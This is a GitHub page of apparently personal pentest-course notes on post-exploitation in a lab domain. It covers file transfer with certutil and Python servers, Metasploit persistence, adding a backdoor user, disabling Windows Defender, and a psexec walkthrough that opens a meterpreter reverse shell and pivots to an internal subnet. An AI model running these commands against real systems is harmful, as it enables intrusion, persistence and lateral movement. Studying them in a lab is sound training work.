-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathPost Exploitation
91 lines (64 loc) · 2.28 KB
/
Post Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
--------------------------------------------------Introduction------------------------------------
*Talk about file transfer , maintaining access ,pivoting lab
*hacker or Red Teamer
-------------------------------------------------File Transfers Review-------------------------------
Certutil
*certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt
HTTP
python -m SimpleHTTPServer 80
FTP
*python -m pyftpdlib 21 (attacker machine)
Linux
wget
----------------------------------------------------Maintaining Access-----------------------------------
*Persistence Scripts
$run persistence -h
$exploi/windows/local/persistence
$exploi/windows/local/registry_persistence
*Scheduled Tasks
$run Scheduleme
$run schtaskabuse
*Add a user
$net user hacker password123 /add
----------------------------------------------------Pivoting lab Setup---------------------------------------
Going to modify the networking
PIVOTING:
In penetration testing, pivoting is the act of using a compromised system to spread between
different computer systems once inside the network, simulating the behavior of a real attacker.
This compromised machine is sometimes referred to as the “instance,” “plant,” or “foothold.”
Configure the ip addresses for different machines.
---------------------------------------------------Pivoting Walkthrough--------------------------------------
in kali machine:
$msfconsole
$use exploits/windows/smb/psexec
$options
$set rhosts 192.168.57.141
$set smbdomain marvel.local
$set smbpass Password1
$set smbuser fcastle
$set payload windows/x64/meterpreter/reverse_tcp
$set lhost eth0
$options
$set target 2
windows defender came to know ,so turn off
$run
we got the shell
$shell
$route print
$arp -a
$go out of the shell
$run autoroute -s 10.10.10.0/24
$run autoroute -p
$background (things run in background)
$search portscan
$use 5
$options
$set rhosts 10.10.10.129
$set port 445
$run
-------------------------------------------------------------CLEANUP-----------------------------------------------
*make the system/network as it was when you entered it
*remove executables,scripts and added files
*remove malware
*set settings back to original configurations
------------------------------------------------------------------------------------------------------------------